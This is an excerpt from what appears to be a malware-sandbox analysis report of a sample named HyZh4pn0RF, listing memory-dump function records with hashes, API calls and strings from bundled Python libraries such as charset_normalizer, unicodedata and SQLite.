                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'CjkInvalidStopPlugin' object attribute '_wrong_stop_count' cannot be deleted$attribute '_wrong_stop_count' of 'CjkInvalidStopPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-420147485
                                                                                                                                                                                                                                                                                                  • Opcode ID: d003440fe6475c9f59ed82b76a527c73c740b1cb598ce72131a3b28642e6cd38
                                                                                                                                                                                                                                                                                                  • Instruction ID: e2369c21c34985d8cab92db2e71192f26b6a60826778bc6019e51775d2ccb241
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d003440fe6475c9f59ed82b76a527c73c740b1cb598ce72131a3b28642e6cd38
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4131A1B1B4A50285EE469B3DECA42B9A3B0AF44B90F58A134DE2E067F5DE2CD4848700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • attribute '_character_count' of 'TooManySymbolOrPunctuationPlugin' undefined, xrefs: 00007FFBAB6A5148
                                                                                                                                                                                                                                                                                                  • 'TooManySymbolOrPunctuationPlugin' object attribute '_character_count' cannot be deleted, xrefs: 00007FFBAB6A51BC
                                                                                                                                                                                                                                                                                                  • int, xrefs: 00007FFBAB6A5246
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'TooManySymbolOrPunctuationPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-4240200891
                                                                                                                                                                                                                                                                                                  • Opcode ID: 536accf797a1bbe65dc8a4d75f5ab69cf8332c7d165fc34bcb50e14afcb09dcc
                                                                                                                                                                                                                                                                                                  • Instruction ID: d77749b48247a48d59f20951f0363d6bbb7238dd4b15d2e2477c21c995ffabb8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 536accf797a1bbe65dc8a4d75f5ab69cf8332c7d165fc34bcb50e14afcb09dcc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 893183F1B4A50281EE56DB7DECA43B9A3B0BF44B90F58A135DE2D467B5DE2CD8848700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'TooManyAccentuatedPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'TooManyAccentuatedPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-2022335554
                                                                                                                                                                                                                                                                                                  • Opcode ID: cef47ad94a8524b23c3b55ca13b9a14f862f4f76f789291d3bde506f314e6f26
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1e11c80d50d98a9a21d2be0c72f3a32c3dcc4e2fc7566a6cf4dbf26afdf9c750
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cef47ad94a8524b23c3b55ca13b9a14f862f4f76f789291d3bde506f314e6f26
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F3150F1E4A50681EE46DB7DE8A43B8A3B0AF44B90F58A135DE3D467B5DE2CE4848700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • 'ArchaicUpperLowerPlugin' object attribute '_character_count_since_last_sep' cannot be deleted, xrefs: 00007FFBAB6A83BC
                                                                                                                                                                                                                                                                                                  • attribute '_character_count_since_last_sep' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FFBAB6A8348
                                                                                                                                                                                                                                                                                                  • int, xrefs: 00007FFBAB6A8446
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'ArchaicUpperLowerPlugin' object attribute '_character_count_since_last_sep' cannot be deleted$attribute '_character_count_since_last_sep' of 'ArchaicUpperLowerPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-2037488444
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1006a038ca7837f55bf567080db1d952f620b641b4547de6e2a8b337716dbb5f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0f2f55bbe59e4ac176568df78b9dfd7786aa6d8f09cf7e284e774b70538663de
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1006a038ca7837f55bf567080db1d952f620b641b4547de6e2a8b337716dbb5f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D53187B2B4A50281EE569B7DEC642B9A3B0FF44B90F5CA135DE6D467B5DE2CE4848300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$FromLong_Ssize_t$ContainsNumber_Object_Set_Vectorcall
                                                                                                                                                                                                                                                                                                  • String ID: bool$feed
                                                                                                                                                                                                                                                                                                  • API String ID: 3415927029-2849697477
                                                                                                                                                                                                                                                                                                  • Opcode ID: eb45302e3cef5080e95074768180575d99dfa37b4141d0cc9422c2bb42ee7491
                                                                                                                                                                                                                                                                                                  • Instruction ID: 954472ff8630d74312636c98f17abfbd48a76d8eed3f786c37469457ae83cb61
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb45302e3cef5080e95074768180575d99dfa37b4141d0cc9422c2bb42ee7491
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB4155B1A0AA4281EF629F6AEC512BAE370FF44B80F44A039DF6D07775DE2CE4518700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3617616757-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 527074c6cd195ab482c56603e858959c90a590d2c84401fac90cb2060dcc2367
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2e65a34acbdc46197f1366e2a6266c5154a4dfba53552a61d432730a73aa39fd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 527074c6cd195ab482c56603e858959c90a590d2c84401fac90cb2060dcc2367
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E41A6B690BA4181EB6A5F7CDC5836876B0AB55B7DF14A338CE39421E48F7EA4859300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2819143443-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1c16e7615a0f82207d80faaa12bf775c49de3bd6999ef687b31fc543c5e7b3c6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8f80ef187a4c1c6b30cdc92d355cd15dd88b9991010b8082888701714dfdb824
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c16e7615a0f82207d80faaa12bf775c49de3bd6999ef687b31fc543c5e7b3c6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1210CF291AA0281EF568F79DD58378B2B0AB58F69F14A234DD39062F4CF7DD4458240
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _PyArg_CheckPositional.PYTHON312 ref: 00007FFBAA463607
                                                                                                                                                                                                                                                                                                  • _PyArg_BadArgument.PYTHON312 ref: 00007FFBAA46363A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FFBAA4611B0: PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFBAA4611E2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FFBAA4611B0: PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFBAA4611FA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FFBAA4611B0: PyType_IsSubtype.PYTHON312 ref: 00007FFBAA46121D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Arg_CompareStringUnicode_With$ArgumentCheckPositionalSubtypeType_
                                                                                                                                                                                                                                                                                                  • String ID: argument 1$argument 2$normalize$str
                                                                                                                                                                                                                                                                                                  • API String ID: 4101545800-1320425463
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2dbf24b9019d36270aeee854f5eb720b9aec5d3fd397e623ab08701816bde558
                                                                                                                                                                                                                                                                                                  • Instruction ID: 14fd16d51f70bb5c44a42fed21446ba68c3c93a9679ca7fe01d1edb9e1fd9593
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2dbf24b9019d36270aeee854f5eb720b9aec5d3fd397e623ab08701816bde558
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5115EE0F0A6C2D0EA62CB66E5406B56368AB05FC4F5890B6ED0D07794DE3CE58AD760
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                                                                                                  • String ID: argument 1$argument 2$is_normalized$str
                                                                                                                                                                                                                                                                                                  • API String ID: 3876575403-184702317
                                                                                                                                                                                                                                                                                                  • Opcode ID: ed7039aedf8594f44b2dcd06c7a3654b924861e91dfb93c4f465d606fbcafc7c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3df196d628ed698989964e912123664099e96aa4e273e9310997234cf7fcc86f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed7039aedf8594f44b2dcd06c7a3654b924861e91dfb93c4f465d606fbcafc7c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB01A1E0F19686D4EF51CB62E5806B56364AB06FC4F4880B2ED0D0B654EF3CD48AC320
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFBAA5E4E5E
                                                                                                                                                                                                                                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 00007FFBAA5E4E35
                                                                                                                                                                                                                                                                                                  • unknown column "%s" in foreign key definition, xrefs: 00007FFBAA5E514C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                                                                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                                                                                  • API String ID: 438689982-272990098
                                                                                                                                                                                                                                                                                                  • Opcode ID: fd81753e9aa9850e33c8090faaef20c6a6f2e69b39017b2b1a283a883e4d74bd
                                                                                                                                                                                                                                                                                                  • Instruction ID: 14a31de3d822aeeb27052e5d6dd2c64634ca54b4a35c1669b29cbb2a85b646e3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd81753e9aa9850e33c8090faaef20c6a6f2e69b39017b2b1a283a883e4d74bd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98D120A2A0A781C6EB76CB25D04077977AAFB46BC4F4441B9DE9E03785DE3CE442C718
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                                                                                  • String ID: abort due to ROLLBACK$another row available$no more rows available$unknown error
                                                                                                                                                                                                                                                                                                  • API String ID: 3510742995-3044471405
                                                                                                                                                                                                                                                                                                  • Opcode ID: e0751fcfef235c84794730e554eb4966c5351462047d42e6373d045085788445
                                                                                                                                                                                                                                                                                                  • Instruction ID: b28086c51b50e66864eeb8631eab31b9890bb68579a315dee1c771c1e13b7250
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0751fcfef235c84794730e554eb4966c5351462047d42e6373d045085788445
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4EF1C6A1A0FA82C1EB668F34E4502B9B3A8FF4AB44F145179DE4E03694DF3DE446D724
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                                                                                                  • API String ID: 438689982-3418467682
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3a72f6d314c914102456c34c9c024b260731ec6175f70502df3334ac74e68f32
                                                                                                                                                                                                                                                                                                  • Instruction ID: 160c1fa9bc0b35aa0479cf9b4547bfd51f663a3e23cb1249ce52c8be58cd852d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a72f6d314c914102456c34c9c024b260731ec6175f70502df3334ac74e68f32
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBB101B2B09695C6D761CBA9E048B7EB7A9FB85B80F014076DE4D43B85DF38E442C714
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$memmove
                                                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                                                                                                  • API String ID: 1283327689-3418467682
                                                                                                                                                                                                                                                                                                  • Opcode ID: d0cd61a46a282bf0fb2f550d918a6c009968a3ecbaac8df5d982ee1dfde62edb
                                                                                                                                                                                                                                                                                                  • Instruction ID: a7bdaa958bc4ef5ffa20ea415311ed7313070391ba389469ce80ec3fbc6339f0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0cd61a46a282bf0fb2f550d918a6c009968a3ecbaac8df5d982ee1dfde62edb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5891BDB2B09281DAD7228B35D5842BD7BE8FB41B44F048172DF4987685DF3CE9A2C724
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A2D16
                                                                                                                                                                                                                                                                                                  • PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A2D42
                                                                                                                                                                                                                                                                                                  • PyNumber_Remainder.PYTHON312 ref: 00007FFBAB6A2D5F
